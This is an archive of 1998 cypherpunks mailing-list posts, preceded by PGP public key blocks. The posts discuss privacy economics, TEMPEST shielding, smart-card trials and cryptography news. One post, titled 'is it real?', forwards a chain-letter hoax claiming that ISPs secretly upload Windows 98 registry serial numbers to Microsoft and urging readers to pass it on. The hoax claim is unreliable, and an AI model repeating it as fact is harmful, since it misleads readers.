7iDCn2w27CdhJ/8ozxliGyow2FLDZ82UDOITu57dUVZs98kE3Edi8rZf8rTQFrwi
xWpJRGzfjSw4eovcsL2jLtB9Gdhmd9ebQ0hTpWFbUiNPLVBxJR1/v55qO2lVUBdf
0OvbsRGmrk7k5RauB3XxRgthIOBcJV/tVDWAncaNTlEaLvdmEqynbga2ohsupM4g
dnF4GuaBP+XcnEOJAEYEGBECAAYFAjS2zdEACgkQw/EfyN/eiFp+8gCg4k9fE2kM
SSvqN3KJVD9Y9+uIrJ0AoPjI1Coa2AkVv9yOsbuTxkLCVI/d
=T8Md
-----END PGP PUBLIC KEY BLOCK-----
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGP for Personal Privacy 5.5.5

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
BHFkEsxHzojm7Hzg4O//gVIyjA==
=w/VQ
-----END PGP PUBLIC KEY BLOCK-----



-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 5 Nov 1998 08:00:21 +0800
To: Jim Choate <cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone(fwd)
In-Reply-To: <199811042301.RAA09484@einstein.ssz.com>
Message-ID: <v04020a1ab26693679160@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



At 6:01 PM -0500 on 11/4/98, Jim Choate wrote, from the bowels of my killfile:


> They're bound by economics and nothing else, not even the government cats.

Amen.

A government is just another economic actor. A very large economic actor
with lots of guns and a monopoly on force, but an economic actor
nonetheless.

Reality is not optional.

Cheers,
Bob Hettinga
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 5 Nov 1998 03:37:37 +0800
To: cypherpunks@einstein.ssz.com
Subject: Dead man running; metabolism no problem to candidates
Message-ID: <199811041910.UAA11450@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



At 03:13 PM 11/3/98 -0800, Bill Stewart wrote:
>On the other hand, it's still tempting to see about putting Frank Zappa
>on the ballot.  He is a bit metabolically challenged these days,


Here in LA, we had a Dead Man Running for sheriff.  This Shermie Block
character croaked before the race, but his party still urged voting for him,
to spite his opponent.  (Some "board" would appoint a replacement, so
the vote was actually for the board.)








  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lewis McCarthy <lmccarth@cs.umass.edu>
Date: Thu, 5 Nov 1998 10:25:23 +0800
To: Cypherpunks List <cypherpunks@cyberpass.net>
Subject: Thurs. night seminar in W. Mass.: All About Alice (and Bob, Eve, and Oscar, too):  The Research Culture of Cryptography
Message-ID: <36410383.A502BDCF@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain



This talk by Jean-Francois Blanchette tomorrow (Thurs.) night may be of interest to 
those of you in the vicinity of western Massachusetts. Check www.hampshire.edu 
for a map and directions. 

Enjoy
-Lewis


--- begin forwarded message ---

ISIS <isisGU@hamp.hampshire.edu> wrote:
 
 Seminar: All About Alice (and Bob, Eve, and Oscar, too):  The Research Culture of Cryptography
 
 Location: West Lecture Hall, Franklin Patterson Hall, Hampshire College,
 =>=>=>  Thursday, November 5, 7:30pm
 
 Modern cryptology researchers have been enthusiastically portrayed in the
 media as cyberspace's Freedom Fighters, and the fruit of their work, as
 tangible evidence that computers not only control, but can also liberate.
 In this seminar, we'll see how this simplistic picture of cryptological
 research shapes both the public perceptions of cryptology, and
 cryptologist's perceptions of themselves and their work.
 Jean-Francois Blanchette will discuss how the culture of secrecy and
 military intelligence has deeply informed the models cryptologists use to
 analyze and design security artifacts. He will also discuss how, from a
 initial concern with communication secrecy, cryptological research has
 dramatically expanded its scope to encompass digital signatures and
 certificates, watermarking, e-cash, copy-protection, and other domains.
 These are all artifacts of much broader cultural and societal import that
 can be fit under the analytical category of "privacy." Cryptologists, as
 well as the rest of us, have to imagine and invent richer and more complex
 representations of what cryptological research is about and what its
 object is, and to explore other social and ethical paradigms than those
 offered by privacy and confidentiality.
 Jean-Francois Blanchette is a graduate student in the Department of
 Science, Technology and Society at Rensselaer Polytechnic Institute.
 Trained as a cryptologist, he is now researching and writing about the
 practices, cultures, and ethics of cryptology.

--- end forwarded message ---




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blanc" <blancw@cnw.com>
Date: Thu, 5 Nov 1998 13:48:25 +0800
To: <cypherpunks@Algebra.COM>
Subject: RE: Quick, Dear -- Beat Me
In-Reply-To: <199811041840.NAA00424@mail1.panix.com>
Message-ID: <000401be087d$55f97aa0$3b8195cf@blanc>
MIME-Version: 1.0
Content-Type: text/plain



>From Duncan Frissell:

: Protection of "victims" won't work if the new number is
: reported to the Big Three credit reporting bureaus.
...................................................

I just went to the bank I do business with this week to open a new account.
They wanted my social security number, (which they actually already have on
record), and during a search on her handy database, the Customer Assistance
clerk informed me that there was another person in Florida using the same
number.

I don't presently have a credit card, so I'm not worried about losing any cash
at this time.    The clerk gave me a form to send to ChexSystems for a consumer
report and advice to notify the Social Security dept about it.   I don't really
want to discuss it with them.  Think it would be to my benefit to just leave it
alone?  <g> Probbly not.

   ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Thu, 5 Nov 1998 13:48:49 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone (fwd)
Message-ID: <5F152E6E8E6FD21195DF00104B2425AD02B241@yarrowbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




> They're bound by economics and nothing else, not even the 
> government cats.

Which is preferable IMHO, and I think most here agree (at least in this
context). As soon as you give some entity (e.g. government) the power of
force to regulate privacy, you create an entity that will abuse that force
and abuse privacy. Plus such regulations are a false security blanket that
diminishes demand for true privacy-creating tools (cryptography) -- not to
mention you current regime turns around and attacks those tools.

Being bound by the law of economics is generally a good thing.

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 5 Nov 1998 05:12:03 +0800
To: cypherpunks@cyberpass.net
Subject: No Subject
Message-ID: <199811042022.VAA22251@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



To: efc-talk@efc.ca
From: David Jones <djones@efc.ca>
Date: Mon, 2 Nov 1998 11:21:57 -0500 (EST)

Seems a bit strange that just when the private sector is recognizing
that smart cards are not yet ready for prime time, the Ontario government
is gearing up to launch a "universal smart card" for the delivery of
government services.  But don't worry, the government smart card will
be better than Mondex ... it will have biometric identification.  ;-)

   Ontario considering smart cards
      http://www.efc.ca/pages/media/national-post.30oct98.html

   Mondex pulls plug on Guelph pilot project
      http://www.efc.ca/pages/media/globe.01nov98.html

   Old-fashioned cash outsmarts smart card
      http://www.efc.ca/pages/media/national-post.01nov98a.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blanc" <blancw@cnw.com>
Date: Thu, 5 Nov 1998 13:48:26 +0800
To: <cypherpunks@cyberpass.net>
Subject: Who Cares
Message-ID: <000601be087d$5cda57e0$3b8195cf@blanc>
MIME-Version: 1.0
Content-Type: text/plain




 When the politicians speak they always make statements which imply that they're
speaking to, and being heard by,  the whole nation.   I just read a notice that
less than 40% of eligible voters went to the polls.   Since the Republicans are
still in the majority, this means that less than one quarter of the voting
population supports Clinton as President.   And only slightly more than one
quarter support Republicans.   This would be meaningful to me, if I was making
policy:  what are all those other people doing?

   ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Thu, 5 Nov 1998 14:02:30 +0800
To: "'Robert Hettinga'" <cypherpunks@cyberpass.net>
Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone (fwd)
Message-ID: <5F152E6E8E6FD21195DF00104B2425AD02B242@yarrowbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain



Robert Hettinga wrote:
> A government is just another economic actor. A very large 
> economic actor with lots of guns and a monopoly on force, 
> but an economic actor nonetheless.

No they are not, nor will they necessarily recognize the economic
consequences of their actions before they entirely self-destruct or mutate
only to do it again. History shows this.

I generally use the economic/political distinction as made by Franz
Oppenheimer, and furthered by Rothbard, Rand, etc. In that context they are
a political actor, not an economic one. I purposefully ignored the prospect
of corporations using coercive force to prevent privacy, it is rather
improbable and still preferable to government coercion -- but note they do
use coercive force today preventing privacy, but government is their
instrument of force.

Jim Choate wrote:
> You need to look around, the government has NO monopoly on force.

They have a *legal* monopoly on force (within a state). You do not generally
consider the black market in determining monopolistic conditions, and in
fact the existence of a black market in a segment generally points to a
coercive monopoly in the public one.

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Thu, 5 Nov 1998 14:04:53 +0800
To: cypherpunks@Algebra.COM
Subject: Re: TEMPEST laptops
In-Reply-To: <v03130318b2627b816c00@[209.66.100.110]>
Message-ID: <v03130323b266ea53c79e@[209.66.100.110]>
MIME-Version: 1.0
Content-Type: text/plain



At 8:06 AM -0800 11/4/98, Petro wrote:

>	What if, instead of trying to entirely prevent leakage, one did a
>combination of "redirecting" and "masking" emissions.
>
>	Keep in mind I am asking from a point of total ignorance.
>
>	To break the question down further, a tempest attack is limited by
>2 things, distance from the machine (IIRC, the "level" or "strength" of RF
>emissions drops by the square of the distance correct?) and (possibly) the
>presence of other sources of RF in about the same bands.
>
>	Assuming that the signal level drops by the square of the distance,
>then one is far more likely to get tempested from a van outside than an
>airplane overhead correct?  In that case, simply design one of Mr. May's
>brazed copper boxes so that it is open something similar to:
[diagram of semi-open box elided]

Radio waves scatter...they don't just travel in pure line of sight. And
even if they travelled only in line of sight, the reflections from inside
the box and then into the room and then off surfaces....

Microwave ovens work by having the waves bounce around inside a box. Any
significant hole or crack (up to roughly half the wavelength) would let the
waves out.

An open top box will not work.

>The other question is how hard, given a _specific_ machine would it be to
>create a "RF" jammer? Sort of an active defense versus the passive defense
>of a Tempest sheild. build a device that measures the RF coming off a
>machine, and rebroadcasts the opposite (i.e. the negation) of the signal?
>This should, or could "flatten" the signal making it useless.

Unlikely to prevent someone from figuring out what the real signal is. It's
very difficult, generally, to hide a signal with another signal. Noise
won't work, because noise can be filtered or autocorrelated out. A "spoof"
signal can be corrected for.

And we are talking about 100 dB sorts of suppression. Mere factors of a few
with fake signals and noise are meaningless on this scale.

--Tim May

Y2K: A good chance to reformat America's hard drive and empty the trash.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zR <q1w2e3@pacific.net.sg>
Date: Wed, 4 Nov 1998 22:42:15 +0800
To: cypherpunks@toad.com
Subject: is it real?
Message-ID: <36413D1D.3C6@pacific.net.sg>
MIME-Version: 1.0
Content-Type: text/plain



>>for your info, please.
>>
>>>>Just in case.......
>>>>......... basically.... don't install Windows 98 ..... since they 
>have
>>>>this "added" function.....  =)
>>>>
>>>> Microsoft slapped two more lawsuit against one teenager and one
>>>>retired worker for using pirated Windows 98 software.
>>>>
>>>>For your information on how Microsoft actually trace PIRATED /
>>>>COPIED / UNLICENSED Windows 98:
>>>>
>>>>Whenever you logon into the internet, during the verifying
>>>>password duration. Your ISP (Internet Service Provider
>>>>eg:SingNET,PacNET,CyberNET,SwiftNET) will download a
>>>>SUB-REGISTRY ENCRYPTED HEXADECIMAL (containing all your
>>>>PROGRAMS serial numbers installed into Win98!!) file from
>>>>your Windows 98 registry. Then they send this SUB-REGISTRY to
>>>>Microsoft for verification. And ONLY Microsoft knows how
>>>>to decode this encypted hexadecimal file.
>>>>
>>>>If Microsoft verified that the serial numbers are authentic,
>>>>then they WILL REGISTER THOSE NUMBERS FOR YOU
>>>>A-U-T-O-M-A-T-C-A-L-L-Y !!!
>>>>
>>>>And if Microsoft denied those serial numbers, then they will send
>>>>an E-Mail to the ISP you dialled into and your ISP will start
>>>>tracing everyone who logons to their systems. That's why during
>>>>sometime for no reason your internet started slowing down.
>>>>And if your ISP verified that the SUB-REGISTRY ENCYPTED HEXADECIMAL
>>>>file is yours, they will send your information over to Microsoft
>>>>Singapore. And there they will decide whether to take actions or not.
>>>>
>>>>There is already 54 cases in Singapore regarding uses of PIRATE
>>>>/ COPIED / UNLICENSED Windows 98.
>>>>
>>>>I do not wish to see any of my friends get into this million dollar
>>>>tangle from Bill Gates, not that I hate this guy, but it really
>>>>sucks when they made such anti-piracy move into the software itself
>>>>- thus forcing everyone to buy Microsoft original's Windows 98, if
>>>>not they'll slap you with a lawsuit.
>>>>
>>>>Forward this mail to as many people you know, and who knows
>>>>you may just save one of your friends from getting sued by Microsoft.
>>>>
>>>>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Cutler <jcutler@via.net>
Date: Thu, 5 Nov 1998 15:09:07 +0800
To: cryptography@c2.net
Subject: Cryptography Study Group - Palo Alto
Message-ID: <199811050645.WAA10935@mustang.via.net>
MIME-Version: 1.0
Content-Type: text/plain




A Palo Alto-centered cryptography study group has been been formed.
Our first project is to read Schneier's "Applied Cryptography."  We
meet a couple times each week to go over assigned reading and to play
with ideas about cryptography.  While the current participants all
have a professional interest in the field, we are loosely organized.
Readings are decided at the previous meeting giving us the flexibility
to explore particular ideas in depth.

Please contact me if you would like to join us.

John Cutler
jcutler@via.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 5 Nov 1998 15:47:18 +0800
To: Bill Stewart <cypherpunks@cyberpass.net
Subject: Re: Kong Re: Using a password as a private key.
In-Reply-To: <199810291821.TAA03804@replay.com>
Message-ID: <199811050725.XAA01933@proxy4.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



    --
At 0144 PM 11/1/98 -0800, Bill Stewart wrote
> By the way, you don't want to hit the "view" button
> after checking this one - you'll get 
> Run-Time Error 3021 - No current Record
> and then Kong dies.

Thanks  I should release a fix on Monday the 9th.

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     z/IoeOpshxPsz77gDorN0rrSb3hSKRfq8BJoUrHV
     4MW1ljpG5hCWlOTNpmvtqe+qucj/X1317qNUJjGxf

-----------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.


http://www.jim.com/jamesd/      James A. Donald




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Thu, 5 Nov 1998 15:47:45 +0800
To: cypherpunks@cyberpass.net
Subject: Re: TEMPEST laptops (fwd)
In-Reply-To: <199811050611.AAA10989@einstein.ssz.com>
Message-ID: <v03130324b266fff2e059@[209.66.100.110]>
MIME-Version: 1.0
Content-Type: text/plain



At 10:11 PM -0800 11/4/98, Jim Choate wrote:
>Forwarded message:
>
>> Date: Wed, 4 Nov 1998 21:45:29 -0800
>> From: Tim May <tcmay@got.net>
>> Subject: Re: TEMPEST laptops
>
>> Radio waves scatter...they don't just travel in pure line of sight. And
>> even if they travelled only in line of sight, the reflections from inside
>> the box and then into the room and then off surfaces....
>
>It depends on the frequency. Last time I checked a laser or a maser (both
>are radio waves strictly speaking) travel LOS. The scattering comes from
>beam divergence and incidental refractions and reflections from the
>molecules in the air and supported detritus.

Oh come on, let's not get into sophistry. And lasers are not considered to
be radio frequency devices by anyone I know of...visible, IR, and UV lasers
are all treated as _photon_ devices, "light."  (Yes, yes, I know about
particles vs. waves.)

>If the microwaves (for example) are transmitted parallel to the open side it
>might very well work just fine. It's going to depend on a variety of
>factors that will preclude such a blanket statement from being valid.

Nope, they'll still get out. The parallel mirror scenario.


>Most of the signals that are emitted by a computer are not in the 100dB
>dynamic range (@2x=3db that's a signal range of 1:33) , more likely 40-50db
>if that. For a TTL (5V) signal it barely covers 3dB (LOW is <2.5v and a
>high is >=4.75). There simply is no way in hell a signal with a 3dB range is
>going to emit a rf signal that is 100dB. There are other logic families with
>wider dynamic ranges (eg CMOS w/ 18V Vcc can be nearly 18V or approx. about
>12dB).

We're talking about signal strength of the emitted RF  being knocked down
80 or 100 dB  by the shielding. This is a common way of talking about the
effectiveness of a Faraday cage.

--Tim May

Y2K: A good chance to reformat America's hard drive and empty the trash.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 5 Nov 1998 13:58:08 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Who Cares (fwd)
Message-ID: <199811050539.XAA10683@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: "Blanc" <blancw@cnw.com>
> Subject: Who Cares
> Date: Wed, 4 Nov 1998 21:22:56 -0800

>  When the politicians speak they always make statements which imply that they're
> speaking to, and being heard by,  the whole nation.   I just read a notice that
> less than 40% of eligible voters went to the polls.   Since the Republicans are
> still in the majority, this means that less than one quarter of the voting
> population supports Clinton as President.   And only slightly more than one
> quarter support Republicans.   This would be meaningful to me, if I was making
> policy:  what are all those other people doing?

If you're talking about the people who didn't vote, they're trying to keep
from going under. Probably working two jobs, keeping the kids in school and
out of trouble, saving for college, paying the house morgage off, etc. Who's
in office won't make a whit of difference to any of that. It's irrelevant.

If you're talking about the politicians, they're laughing their ass off on
the way to the bank to cash their tax-derived income.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Fri, 6 Nov 1998 04:00:25 +0800
To: Narayan Raghu <narry@geocities.com>
Subject: Re: new 448 bit key by Indian firm
In-Reply-To: <v04020a0ab263d0da7260@[139.167.130.246]>
Message-ID: <3.0.5.32.19981104234056.008b6880@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 03:43 AM 11/3/98 +0530, Narayan Raghu wrote:
>            Indian firm unveils 448-bit encryption

448 bits sounds a lot like MD5-based encryption - perhaps Luby-Rackoff or MDC?
Or a homegrown system, doing successive MD5s or something?
MD5 is no longer the safest hash these days....


				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 5 Nov 1998 14:02:31 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone (fwd)
Message-ID: <199811050545.XAA10791@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Matthew James Gering <mgering@ecosystems.net>
> Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone
> 	 (fwd)
> Date: Wed, 4 Nov 1998 21:20:34 -0800 

> > They're bound by economics and nothing else, not even the 
> > government cats.
> 
> Which is preferable IMHO, and I think most here agree (at least in this
> context). As soon as you give some entity (e.g. government) the power of
> force to regulate privacy,

Woah there cowboy, just exactly how the hell do you jump from economics to
privacy...talk about a strawman.

> you create an entity that will abuse that force

Abuse is the nature of man, not economics, privacy, government systems, etc.
They're things, they have no desire and most definitely have no concept of
privacy, economics, duty, etc. A a person or persons are abused it's by
another person or persons.

> Plus such regulations are a false security blanket that
> diminishes demand for true privacy-creating tools (cryptography) -- not to
> mention you current regime turns around and attacks those tools.

It depends on the regulation and how it's applied. You simply can't
equitably apply the statement that all regulation is bad because it's equaly
clear that no regulation has its own pitfalls and abuses.

> Being bound by the law of economics is generally a good thing.

Yes, provided you have 'fair competition' which you can't in a free market.
Provided all companies and their management operate within some sort of
ethical guidelines, which they won't (and don't). And on and on.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Fri, 6 Nov 1998 04:02:11 +0800
To: John Young <cypherpunks@toad.com
Subject: Re: NYC Smartcards Die
In-Reply-To: <199811041618.LAA31005@camel7.mindspring.com>
Message-ID: <3.0.5.32.19981104234624.008b6880@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 11:09 AM 11/4/98 -0500, John Young wrote:
>Chase, Visa and Mastercard have closed down their
>smartcard trial on the Upper West Side of Manhattan, 
>the NYT reports today.
>It also says Mondex has closed its Swindon trial.

I don't know about Swindon's Mondex trial,
but Mondex in San Francisco was dumbly too annoying to use.
Wells Fargo was promoting it, Starbucks accepted it,
and both were around the corner from my office.
The _catch_ was that you couldn't just walk into a bank,
plunk down some dead presidents, and get a Mondex card.
Instead, you could walk into the bank, get a brochure,
use a phone there to call an 800 number, and they'll
mail it to you or something awkward like that.
It may be a mostly-bearer system instead of book entry,
but they're handling it like book-entry.  Lose, lose.


				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 5 Nov 1998 14:18:21 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone (fwd)
Message-ID: <199811050554.XAA10925@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Matthew James Gering <mgering@ecosystems.net>
> Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone
> 	 (fwd)
> Date: Wed, 4 Nov 1998 21:43:31 -0800 

> Robert Hettinga wrote:
> > A government is just another economic actor. A very large 
> > economic actor with lots of guns and a monopoly on force, 
> > but an economic actor nonetheless.
> 
> No they are not,

Yes, they are. Can you say 'taxes'? Can you say 'interstate commerce'?
Can you say 'mint money'? Can you say 'federal reserve'? Can you say 'FDIC'?

I thought so.

> nor will they necessarily recognize the economic
> consequences of their actions before they entirely self-destruct or mutate
> only to do it again. History shows this.

Really? What history?

> I generally use the economic/political distinction as made by Franz
> Oppenheimer, and furthered by Rothbard, Rand, etc. In that context they are
> a political actor, not an economic one.

False distinction. Politics is about control and power, and in human society
that breaks down to force and money.

> I purposefully ignored the prospect
> of corporations using coercive force to prevent privacy, it is rather

There you go again, confusing privacy with economics...

> improbable and still preferable to government coercion -- but note they do
> use coercive force today preventing privacy, but government is their
> instrument of force.

True, but that isn't a function of regulation per se only the particular
type of regulation that we have implimented. You're arguing from a specific
example and trying to extrapolate to a general rule and it don't fly.

> Jim Choate wrote:
> > You need to look around, the government has NO monopoly on force.
> 
> They have a *legal* monopoly on force (within a state).

